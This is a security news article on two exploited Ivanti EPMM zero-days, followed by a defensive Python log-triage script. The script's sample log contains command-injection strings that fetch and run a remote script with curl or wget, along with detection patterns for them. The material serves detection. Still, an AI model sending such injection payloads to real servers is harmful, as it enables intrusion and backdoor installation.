Attackers are actively exploiting two critical zero-day vulnerabilities in Ivanti’s Endpoint Manager Mobile (EPMM). These vulnerabilities allow unauthorized individuals to gain control of enterprise mobile device management systems and to install backdoors that can persist even after organizations apply available patches.
According to Palo Alto Networks’ Unit 42 threat research team, “Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, impacting enterprise mobile fleets and corporate networks. These vulnerabilities enable unauthenticated attackers to remotely execute arbitrary code on target servers, granting them complete control over mobile device management (MDM) infrastructure without requiring user interaction or valid credentials.”
EPMM, previously known as MobileIron Core, is a platform used by enterprises to manage and enforce security policies on employee smartphones and tablets.
Palo Alto Networks’ attack surface management platform, Cortex Xpanse, has identified over 4,400 EPMM instances currently exposed on the public internet. If compromised, attackers could gain access to device policies, credentials, and metadata across an organization’s entire mobile fleet.
Both vulnerabilities carry a CVSS score of 9.8, allowing unauthenticated attackers to execute arbitrary commands on exposed EPMM servers without user interaction or valid credentials.
Ivanti acknowledged the attacks when it released emergency patches in late January, but described the initial impact as limited. “We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure,” the company stated in its security advisory.
According to Unit 42, both vulnerabilities arise from unsafe Bash script handling in outdated Apache web server configurations. CVE-2026-1281 targets the In-House Application Distribution feature, while CVE-2026-1340 exploits a similar flaw through a separate script managing the Android File Transfer mechanism. “Although the root cause is the same, they reside in two distinct scripts handling different features,” the advisory explained.
From Scan to Backdoor
Unit 42 has documented instances where threat actors move from automated scanning to initial access within a short window and then deploy persistent backdoors designed to outlast patching efforts.
Once initial access is achieved, attackers typically attempt to download and execute a second-stage payload. “This second stage usually installs a web shell, a cryptominer, or a persistent backdoor to maintain control of the appliance,” the advisory noted.
Unit 42 also reported that attackers have utilized the Nezha open-source monitoring agent to retain visibility over compromised systems. The sectors targeted include state and local government, healthcare, manufacturing, professional services, and high technology across the United States, Germany, Australia, and Canada.
Moreover, Unit 42 cautioned that proof-of-concept exploit code for both CVEs is already publicly available, increasing the likelihood of broader exploitation as more threat actors adopt effective exploits.
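Unit 42 describes the chain above as scanning, initial access through unsafe Bash handling of request input, and then retrieval of a second stage. The Python script below is an added example, not Unit 42's or Ivanti's code: it triages Apache access-log lines for the two indicators that chain implies (shell metacharacters in a query string, and a remote-fetch tool named in the same request), groups hits by source address, and separately checks a `ps` listing for the Nezha agent mentioned above. The log lines, request paths (`/example/...`), addresses and process listing are all constructed placeholders; the page does not name the vulnerable scripts' URLs, so the paths carry no meaning beyond the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not real EPMM logs).
# The /example/... paths are hypothetical placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Feb/2026:10:01:12 +0000] "GET /example/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Feb/2026:10:01:13 +0000] "GET /example/admin HTTP/1.1" 401 0 "-" "python-requests/2.31"
198.51.100.9 - - [02/Feb/2026:10:02:40 +0000] "GET /example/inhouse-app?file=a.apk;curl%20http://198.51.100.9/x.sh|sh HTTP/1.1" 200 0 "-" "curl/8.4.0"
198.51.100.9 - - [02/Feb/2026:10:02:44 +0000] "GET /example/aft?name=$(wget%20-O-%20http://198.51.100.9/agent) HTTP/1.1" 200 0 "-" "curl/8.4.0"
192.0.2.15 - - [02/Feb/2026:10:05:00 +0000] "POST /example/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Constructed `ps -eo pid,user,args` output; the agent path is a placeholder.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
  812 apache   /usr/sbin/httpd -DFOREGROUND
 4471 apache   /tmp/.x/nezha-agent -s 198.51.100.9:5555
"""

# Apache combined log format: ip ident user [ts] "method target proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Characters that a Bash script interpolating a parameter unquoted would
# interpret: command separators, pipes, and command substitution.
SHELL_META_RE = re.compile(r'(;|\|\||\||&&|`|\$\()')
# Fetch tools typically named when a second stage is pulled from the attacker.
FETCH_RE = re.compile(r'\b(curl|wget)\b', re.IGNORECASE)
# Process-name indicator for the open-source Nezha monitoring agent.
NEZHA_RE = re.compile(r'nezha', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    # Decode percent-encoding so "%20" and similar do not hide the pattern.
    entry["decoded"] = unquote(entry["target"])
    return entry


def classify(entry):
    """Return the indicator tags for one parsed request (empty set if benign)."""
    tags = set()
    _path, _sep, query = entry["decoded"].partition("?")
    if SHELL_META_RE.search(query):
        tags.add("shell-meta-in-query")
    if FETCH_RE.search(query):
        tags.add("remote-fetch-in-query")
    if tags and entry["status"] == "200":
        tags.add("served-200")  # the server accepted the request rather than rejecting it
    return tags


def triage(log_text):
    """Group flagged requests by source IP and mark sources showing the full chain."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            by_ip[entry["ip"]].append(
                {"ts": entry["ts"], "target": entry["decoded"], "tags": tags}
            )
    findings = {}
    for ip, hits in by_ip.items():
        seen = set().union(*(h["tags"] for h in hits))
        findings[ip] = {
            "hits": hits,
            # Injection plus a fetch tool from the same source is the scan-to-backdoor chain.
            "chain": {"shell-meta-in-query", "remote-fetch-in-query"} <= seen,
        }
    return findings


def suspect_processes(ps_text):
    """Return process lines (header skipped) that reference the Nezha agent."""
    return [ln for ln in ps_text.splitlines()[1:] if NEZHA_RE.search(ln)]


if __name__ == "__main__":
    for ip, result in triage(SAMPLE_LOG).items():
        print(ip, "chain" if result["chain"] else "isolated", len(result["hits"]), "hit(s)")
    for proc in suspect_processes(SAMPLE_PS):
        print("suspect process:", proc.strip())
```

Access logs only record the request line, so parameters sent in a POST body do not appear here; a hunt on a real appliance should also cover the web server's error log and any request-body logging, and should treat a hit as a trigger for the rebuild-and-rotate response described later rather than as something to clean up in place.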
Patch, but Verify First
Unit 42 has directed organizations to refer to Ivanti’s security advisory for remediation guidance. The advisory recommends applying version-specific RPM patches for the EPMM 12.x branches, which require no appliance downtime. However, Ivanti has cautioned that the patch does not persist through a version upgrade and must be reinstalled if the software is updated. “The permanent fix for this vulnerability will be included in the next product release: 12.8.0.0 expected in Q1 2026.”
Ivanti also warned that while its Sentry mobile traffic gateway is not directly vulnerable, EPMM possesses command execution permissions on connected Sentry systems. “If an EPMM deployment has been compromised, the attackers might have compromised Ivanti Sentry as well,” the company advised.
For organizations suspecting compromise, Ivanti’s advisory advises against attempting to clean affected systems. Instead, it recommends restoring from a known-good backup or performing a full rebuild, followed by a complete reset of all account passwords, service credentials, and public certificates. With proof-of-concept exploit code already publicly available for both CVEs, broader exploitation is anticipated as more threat actors begin to utilize working exploits.
A Familiar Pattern
The targeting of EPMM follows a trend that will be recognizable to Ivanti customers. This product has previously been exploited on a large scale. In 2023, state-sponsored attackers utilized EPMM zero-days to infiltrate Norwegian government networks, while separate flaws were exploited in the wild last year.
Ivanti’s Connect Secure VPN product has also faced similar challenges, with Chinese APT groups exploiting zero-days in consecutive campaigns. This ultimately led the US government to mandate the disconnection of Ivanti VPN products from federal agencies entirely in February 2024.